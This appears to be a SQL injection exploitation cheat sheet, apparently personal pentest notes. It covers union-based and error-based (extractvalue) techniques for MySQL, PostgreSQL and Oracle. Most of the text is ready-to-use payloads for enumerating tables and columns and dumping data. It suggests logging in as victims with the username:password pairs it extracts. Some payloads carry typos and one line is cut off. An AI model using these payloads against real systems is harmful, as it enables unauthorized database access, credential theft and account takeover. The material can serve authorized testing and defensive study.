Once you know that an endpoint is vulnerable to SQL injection the next step is to exploit it:
Figure out how many columns the endpoint contains using the âorder byâ operator and keep adding one to the number until you get an error:
--> Order by 1 --> Order by 2 --> Order by n --> error (indicates there must be n-1 columns).
Figure out which columns are being displayed on the page using the âunion all selectâ statement which can be accomplished by putting an invalid value:
--> Notice the numbers on the page refer to the columns displayed on the front end.
Display the database version using mysql commands:
--> @@version / version()
--> đĄNote the version down to help later
get a list of database tables:
union allselect1,2,group_concat(table_name) from information_schema.tables where table_schema =database()
Get the table's columns
union allselect1,2,group_concat(column_name) from information_schema.columns where table_name ="tbName"
Dump the contents of specific columns:
union allselect1,2,group_concat(col,":",col) from tbNa
In case retrieving username:password for a user, we can use them to log in as that user.
Useful when there is no output except a SQL error.
Xpath
If the MySql service version is 5.1 or later we can use the â extractvalue() â function to exfiltrate data from the database.
generates a SQL error when it is unable to parse the XML data passed to it.
ExtractValue() function
used to parse out a value from an XML document
The first argument is an XML document and the second argument is the tag we want to get the value of.
second argument starts with a â;â it will cause a MySql error message to appear along with the string that caused the error.
Abusing ExtractValue() function to extract data via error messages:
extract the MySql database version via an error message:
AND extractvalue("blahh",concat(";",@@version))
get a list of table names:
// Note: The âlimit 0,1â command is used to get the first row in the table
// and to get the second table you would use âlimit 1,1â
AND extractvalue("blahh",(select concat(";",table_name) from information_schema.tables where table_schema = database() limit 0,1))
Get a list of columns belonging to a specific table:
AND extractvalue("blahh",(select concat(";",column_name) from information_schema.columns where table_name = "tbName" limit 0,1))
dump the contents of specific columns:
AND extractvalue("blahh",(select concat(";",col,":",col) from tbName limit 0,1))
In case retrieving username:password for a user, we can use them to log in as that user.
PostgreSQL
In case an error message is displayed, if you see the âpsycopg2â name you know youâre working with a Postgres database server.
Union Based
Figure out how many columns the endpoint contains using the âorder byâ operator and keep adding one to the number until you get an error:
--> Order by 1 --> Order by 2 --> Order by n --> error (indicates there must be n-1 columns).
Figure out which columns are being displayed on the page using the âunion all selectâ statement which can be accomplished by putting an invalid value:
--> Notice the numbers on the page refer to the columns displayed on the front end.
If you weren't able to detect the database type from the error message you could always use the âversion()â function to print the database type:
-->-1 union all select 1,version()
Get a list of all tables in the databases:
// Offset â0â gets the first table name, offset â1â gets the second, and so on.
// filter out the default databases âpg_catalogâ and âinformation_schemaâ as they tend to clog up the results.
union all select 1,table_name from information_schema.tables where table_schema != 'pg_catalog' and table_schema != 'information_schema' offset 0
Get a list of columns belonging to a specific table:
union all select 1,column_name from information_schema.columns where table_name = 'tbName' offset 0
Dump the contents of specific columns:
union all select 1,concat(col,':',col) from tbName offset 0
In case retrieving username:password for a user, we can use them to log in as that user.
Oracle
Requires some additional knowledge to successfully exploit it.
Similar to PostgreSQL when you are selecting a column it must match the type of the first select statement.
When using the select operator you must specify a default âdualâ table.
Test
Throw a bunch of single and double quotes around until you get an error message starting with âORAâ which indicates dealing with an Oracle database.
Union Based
Figure out how many columns the endpoint contains using the âorder byâ operator and keep adding one to the number until you get an error:
--> Order by 1 --> Order by 2 --> Order by n --> error (indicates there must be n-1 columns).
Figure out which columns are being displayed on the page using the âunion all selectâ statement which can be accomplished by putting an invalid value:
--> Notice the numbers on the page refer to the columns displayed on the front end.
Figure out the target table name:
//Oracle uses the âall_tablesâ e to get a list of tables.
// When using the listagg() function you must also use the âwithin group()â operator to specify the order of the listagg function results.
union all select LISTAGG(table_name,',') within group (ORDER BY table_name),null from all_tables where tablespace_name = 'USERS' --
Get the table's columns:
union all select LISTAGG(column_name,',') within group (ORDER BY column_name),null from all_tab_columns where table_name = 'EMPLOYEES'--
Extract the sensitive information
Union all select email,phone_number from employees